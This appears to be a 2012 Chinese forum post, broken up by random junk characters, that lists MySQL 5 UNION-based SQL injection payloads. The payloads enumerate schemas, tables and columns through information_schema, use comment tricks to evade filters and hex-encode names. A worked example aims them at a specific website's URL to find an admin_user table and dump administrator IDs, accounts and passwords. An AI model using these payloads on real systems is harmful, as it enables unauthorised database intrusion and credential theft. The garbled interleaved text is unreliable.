查库2 Q3 F/ z5 E: [% o4 }. y
0 P9 o! y2 T. Z S/ O" h0 ]* Y3 a6 w
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*! D- x- Q, n2 M4 S/ v2 [- u3 T- V* j
% |! j; u$ Q: |查表1 N/ T o8 f3 J, C) Q z+ p
' |' f2 S3 B0 A5 ]
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
1 }9 r0 f1 N+ T3 k
4 [: S! }/ W: r3 v, Q查段
( q8 ?6 a7 S9 o* I
- a) s2 n: E) h" {: b+ \id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
2 N# G$ \+ v3 k1 C7 U$ O
& ], @- H8 j% W4 R1 C# v0 \. q2 D& |( V" k6 v! |
mysql5高级注入方法暴表
! g$ A* B( Y4 j2 q8 P1 f4 l3 M% ?& P/ P! v+ A1 c+ z1 E8 d0 E
例子如下:
: ]( ^# ~' L% i1 k/ a5 r# i# Q! m% O5 I+ [8 @
1.爆表5 }3 y# `# l& g& X/ r2 d
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
# \" I/ x; C* F. C1 @这样爆到第4个时出现了admin_user表。
3 h8 m0 N6 \8 B4 O! d. _ w8 V5 ^& Y4 Q8 \* P0 F
2.暴字段
* i8 C0 K; N1 B$ p! Z/ Z: ghttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*" e) T$ c' z R% i
0 \, U1 ~2 i2 b6 b- u4 a' D1 J: v: c8 a1 z
3.爆密码
+ R7 h9 z# y8 U2 p/ u" ]4 Hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 8 A( f# i7 i- Z8 Z: l! w- m
. T+ h9 w5 ?6 F% [# K
4 }% k" @' e1 `8 t' ~ ^ |
发表于 2012-9-13 16:29:37
收藏
支持
反对